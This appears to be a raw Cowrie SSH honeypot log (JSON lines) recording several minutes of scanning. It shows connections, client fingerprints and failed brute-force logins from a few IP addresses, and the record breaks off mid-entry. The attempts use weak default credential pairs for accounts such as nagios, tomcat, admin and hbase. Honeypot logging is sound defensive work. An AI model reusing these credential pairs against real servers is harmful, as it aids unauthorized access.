{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-09-08T14:00:39.484170Z","src_ip":"134.199.174.250","session":"9688632eb64c"}
{"eventid":"cowrie.session.closed","duration":"3.0","message":"Connection lost after 3.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T14:00:39.687823Z","src_ip":"212.227.235.229","session":"b47727657db4"}
{"eventid":"cowrie.login.failed","username":"nagios","password":"qwerty123","message":"login attempt [nagios/qwerty123] failed","sensor":"my-vps","timestamp":"2025-09-08T14:00:40.381326Z","src_ip":"134.199.174.250","session":"9688632eb64c"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-09-08T14:00:41.681254Z","src_ip":"134.199.174.250","session":"9688632eb64c"}
{"eventid":"cowrie.session.connect","src_ip":"134.199.174.250","src_port":44964,"dst_ip":"1.2.3.4","dst_port":22,"session":"91b2681bc0ea","protocol":"ssh","message":"New connection: 134.199.174.250:44964 (1.2.3.4:22) [session: 91b2681bc0ea]","sensor":"my-vps","timestamp":"2025-09-08T14:01:12.588269Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-08T14:01:12.589206Z","src_ip":"134.199.174.250","session":"91b2681bc0ea"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-09-08T14:01:13.047053Z","src_ip":"134.199.174.250","session":"91b2681bc0ea"}
{"eventid":"cowrie.login.failed","username":"nagios","password":"1q2w3e4r","message":"login attempt [nagios/1q2w3e4r] failed","sensor":"my-vps","timestamp":"2025-09-08T14:01:14.001554Z","src_ip":"134.199.174.250","session":"91b2681bc0ea"}
{"eventid":"cowrie.session.closed","duration":"2.7","message":"Connection lost after 2.7 seconds","sensor":"my-vps","timestamp":"2025-09-08T14:01:15.307227Z","src_ip":"134.199.174.250","session":"91b2681bc0ea"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":52628,"dst_ip":"1.2.3.4","dst_port":22,"session":"5f402b89b4eb","protocol":"ssh","message":"New connection: 217.72.205.35:52628 (1.2.3.4:22) [session: 5f402b89b4eb]","sensor":"my-vps","timestamp":"2025-09-08T14:01:39.028817Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T14:01:39.029732Z","src_ip":"217.72.205.35","session":"5f402b89b4eb"}
{"eventid":"cowrie.session.connect","src_ip":"134.199.174.250","src_port":34924,"dst_ip":"1.2.3.4","dst_port":22,"session":"806161ac65f3","protocol":"ssh","message":"New connection: 134.199.174.250:34924 (1.2.3.4:22) [session: 806161ac65f3]","sensor":"my-vps","timestamp":"2025-09-08T14:01:45.489486Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-08T14:01:45.491436Z","src_ip":"134.199.174.250","session":"806161ac65f3"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-09-08T14:01:45.818287Z","src_ip":"134.199.174.250","session":"806161ac65f3"}
{"eventid":"cowrie.login.failed","username":"nagios","password":"pass123","message":"login attempt [nagios/pass123] failed","sensor":"my-vps","timestamp":"2025-09-08T14:01:46.805464Z","src_ip":"134.199.174.250","session":"806161ac65f3"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-09-08T14:01:48.133786Z","src_ip":"134.199.174.250","session":"806161ac65f3"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":36822,"dst_ip":"1.2.3.4","dst_port":22,"session":"b31135f92c71","protocol":"ssh","message":"New connection: 212.227.235.229:36822 (1.2.3.4:22) [session: b31135f92c71]","sensor":"my-vps","timestamp":"2025-09-08T14:02:03.018005Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T14:02:03.024228Z","src_ip":"212.227.235.229","session":"b31135f92c71"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T14:02:03.248696Z","src_ip":"212.227.235.229","session":"b31135f92c71"}
{"eventid":"cowrie.login.failed","username":"admin","password":"!","message":"login attempt [admin/!] failed","sensor":"my-vps","timestamp":"2025-09-08T14:02:04.150481Z","src_ip":"212.227.235.229","session":"b31135f92c71"}
{"eventid":"cowrie.session.closed","duration":"2.4","message":"Connection lost after 2.4 seconds","sensor":"my-vps","timestamp":"2025-09-08T14:02:05.377723Z","src_ip":"212.227.235.229","session":"b31135f92c71"}
{"eventid":"cowrie.session.connect","src_ip":"106.52.40.62","src_port":49376,"dst_ip":"1.2.3.4","dst_port":22,"session":"b3cb3fe560aa","protocol":"ssh","message":"New connection: 106.52.40.62:49376 (1.2.3.4:22) [session: b3cb3fe560aa]","sensor":"my-vps","timestamp":"2025-09-08T14:02:10.812964Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-08T14:02:10.814652Z","src_ip":"106.52.40.62","session":"b3cb3fe560aa"}
{"eventid":"cowrie.client.kex","hassh":"084386fa7ae5039bcf6f07298a05a227","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 084386fa7ae5039bcf6f07298a05a227","sensor":"my-vps","timestamp":"2025-09-08T14:02:13.615070Z","src_ip":"106.52.40.62","session":"b3cb3fe560aa"}
{"eventid":"cowrie.session.closed","duration":"6.8","message":"Connection lost after 6.8 seconds","sensor":"my-vps","timestamp":"2025-09-08T14:02:17.644870Z","src_ip":"106.52.40.62","session":"b3cb3fe560aa"}
{"eventid":"cowrie.session.connect","src_ip":"134.199.174.250","src_port":36138,"dst_ip":"1.2.3.4","dst_port":22,"session":"1e24e9be89fe","protocol":"ssh","message":"New connection: 134.199.174.250:36138 (1.2.3.4:22) [session: 1e24e9be89fe]","sensor":"my-vps","timestamp":"2025-09-08T14:02:17.879933Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-08T14:02:17.911419Z","src_ip":"134.199.174.250","session":"1e24e9be89fe"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-09-08T14:02:18.177436Z","src_ip":"134.199.174.250","session":"1e24e9be89fe"}
{"eventid":"cowrie.login.failed","username":"nagios","password":"123abc","message":"login attempt [nagios/123abc] failed","sensor":"my-vps","timestamp":"2025-09-08T14:02:19.370253Z","src_ip":"134.199.174.250","session":"1e24e9be89fe"}
{"eventid":"cowrie.session.closed","duration":"2.8","message":"Connection lost after 2.8 seconds","sensor":"my-vps","timestamp":"2025-09-08T14:02:20.693848Z","src_ip":"134.199.174.250","session":"1e24e9be89fe"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":49074,"dst_ip":"1.2.3.4","dst_port":22,"session":"ab66d0c0b830","protocol":"ssh","message":"New connection: 212.227.235.229:49074 (1.2.3.4:22) [session: ab66d0c0b830]","sensor":"my-vps","timestamp":"2025-09-08T14:02:37.220226Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-09-08T14:02:37.221232Z","src_ip":"212.227.235.229","session":"ab66d0c0b830"}
{"eventid":"cowrie.session.connect","src_ip":"134.199.174.250","src_port":34738,"dst_ip":"1.2.3.4","dst_port":22,"session":"3d64d5ed3e56","protocol":"ssh","message":"New connection: 134.199.174.250:34738 (1.2.3.4:22) [session: 3d64d5ed3e56]","sensor":"my-vps","timestamp":"2025-09-08T14:02:48.966308Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-08T14:02:48.967295Z","src_ip":"134.199.174.250","session":"3d64d5ed3e56"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-09-08T14:02:49.341401Z","src_ip":"134.199.174.250","session":"3d64d5ed3e56"}
{"eventid":"cowrie.login.failed","username":"tomcat","password":"1234567890","message":"login attempt [tomcat/1234567890] failed","sensor":"my-vps","timestamp":"2025-09-08T14:02:50.210226Z","src_ip":"134.199.174.250","session":"3d64d5ed3e56"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-09-08T14:02:51.489132Z","src_ip":"134.199.174.250","session":"3d64d5ed3e56"}
{"eventid":"cowrie.session.connect","src_ip":"134.199.174.250","src_port":53696,"dst_ip":"1.2.3.4","dst_port":22,"session":"aa785748fd7f","protocol":"ssh","message":"New connection: 134.199.174.250:53696 (1.2.3.4:22) [session: aa785748fd7f]","sensor":"my-vps","timestamp":"2025-09-08T14:03:20.447198Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-08T14:03:20.448333Z","src_ip":"134.199.174.250","session":"aa785748fd7f"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-09-08T14:03:20.883693Z","src_ip":"134.199.174.250","session":"aa785748fd7f"}
{"eventid":"cowrie.login.failed","username":"tomcat","password":"password1","message":"login attempt [tomcat/password1] failed","sensor":"my-vps","timestamp":"2025-09-08T14:03:21.812580Z","src_ip":"134.199.174.250","session":"aa785748fd7f"}
{"eventid":"cowrie.session.closed","duration":"2.7","message":"Connection lost after 2.7 seconds","sensor":"my-vps","timestamp":"2025-09-08T14:03:23.114014Z","src_ip":"134.199.174.250","session":"aa785748fd7f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":34150,"dst_ip":"1.2.3.4","dst_port":22,"session":"4137d9d0eb3d","protocol":"ssh","message":"New connection: 212.227.235.229:34150 (1.2.3.4:22) [session: 4137d9d0eb3d]","sensor":"my-vps","timestamp":"2025-09-08T14:03:28.087646Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T14:03:28.091292Z","src_ip":"212.227.235.229","session":"4137d9d0eb3d"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T14:03:28.317004Z","src_ip":"212.227.235.229","session":"4137d9d0eb3d"}
{"eventid":"cowrie.login.failed","username":"hbase","password":"111","message":"login attempt [hbase/111] failed","sensor":"my-vps","timestamp":"2025-09-08T14:03:29.221668Z","src_ip":"212.227.235.229","session":"4137d9d0eb3d"}
{"eventid":"cowrie.session.closed","duration":"2.4","message":"Connection lost after 2.4 seconds","sensor":"my-vps","timestamp":"2025-09-08T14:03:30.451786Z","src_ip":"212.227.235.229","session":"4137d9d0eb3d"}
{"eventid":"cowrie.session.connect","src_ip":"134.199.174.250","src_port":40542,"dst_ip":"1.2.3.4","dst_port":22,"session":"b97f4bc974a5","protocol":"ssh","message":"New connection: 134.199.174.250:40542 (1.2.3.4:22) [session: b97f4bc974a5]","sensor":"my-vps","timestamp":"2025-09-08T14:03:49.974027Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-08T14:03:49.974829Z","src_ip":"134.199.174.250","session":"b97f4bc974a5"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-